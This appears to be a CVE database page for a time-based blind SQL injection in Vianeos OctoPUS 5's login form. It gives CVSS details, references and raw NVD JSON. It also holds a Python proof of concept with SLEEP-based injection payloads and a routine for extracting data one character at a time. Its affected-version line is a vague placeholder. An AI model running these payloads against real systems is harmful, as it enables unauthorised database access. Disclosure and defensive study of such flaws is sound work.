CVE-2021-47801

Description

Vianeos OctoPUS 5 contains a time-based blind SQL injection vulnerability in the 'login_user' parameter during authentication requests. Attackers can exploit this vulnerability by crafting malicious POST requests with specially constructed SQL payloads that trigger database sleep functions to extract information.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Vianeos OctoPUS 5 < 5.x.x (具体版本需参考官方补丁公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import time

# CVE-2021-47801 Time-based Blind SQL Injection PoC
# Target: Vianeos OctoPUS 5 login_user parameter

target_url = "http://target.com/octopus/login"

def test_sqli(payload):
    """Test SQL injection with given payload"""
    data = {
        'login_user': payload,
        'login_password': 'test',
        'submit': 'Login'
    }
    start_time = time.time()
    response = requests.post(target_url, data=data, timeout=30)
    elapsed = time.time() - start_time
    return elapsed, response

# Basic time-based blind SQL injection test
payload = "admin' OR SLEEP(5)-- -"
print(f"Testing payload: {payload}")
elapsed, resp = test_sqli(payload)
print(f"Response time: {elapsed:.2f} seconds")
print(f"Response status: {resp.status_code}")

# Extract single character using time-based technique
def extract_char(database, query, char_pos):
    """Extract character using time-based blind SQL injection"""
    payload = f"admin' AND IF(SUBSTRING(({query}),{char_pos},1)=CHAR({ord(database)}),SLEEP(5),0)-- -"
    elapsed, _ = test_sqli(payload)
    return elapsed > 4

# Example: Extract database version
# query = "SELECT @@version"
# for i in range(1, 50):
#     for ascii_val in range(32, 127):
#         if extract_char(chr(ascii_val), query, i):
#             print(chr(ascii_val), end='', flush=True)
#             break

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47801
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47801
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47801/
[4] VulDB https://vuldb.com/cve/CVE-2021-47801
[5] http://www.vianeos.com/en/home-vianeos/
[6] https://vianeos.com/en/products/octopus
[7] https://www.exploit-db.com/exploits/50078
[8] https://www.vulncheck.com/advisories/vianeos-octopus-loginuser-sqli

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47801", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:24.517", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vianeos OctoPUS 5 contains a time-based blind SQL injection vulnerability in the 'login_user' parameter during authentication requests. Attackers can exploit this vulnerability by crafting malicious POST requests with specially constructed SQL payloads that trigger database sleep functions to extract information."}, {"lang": "es", "value": "Vianeos OctoPUS 5 contiene una vulnerabilidad de inyección SQL ciega basada en tiempo en el parámetro 'login_user' durante las solicitudes de autenticación. Los atacantes pueden explotar esta vulnerabilidad mediante la creación de solicitudes POST maliciosas con cargas útiles SQL especialmente construidas que activan funciones de suspensión de la base de datos para extraer información."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "http://www.vianeos.com/en/home-vianeos/", "source": "[email protected]"}, {"url": "https://vianeos.com/en/products/octopus", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50078", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/vianeos-octopus-loginuser-sqli", "source": "[email protected]"}]}}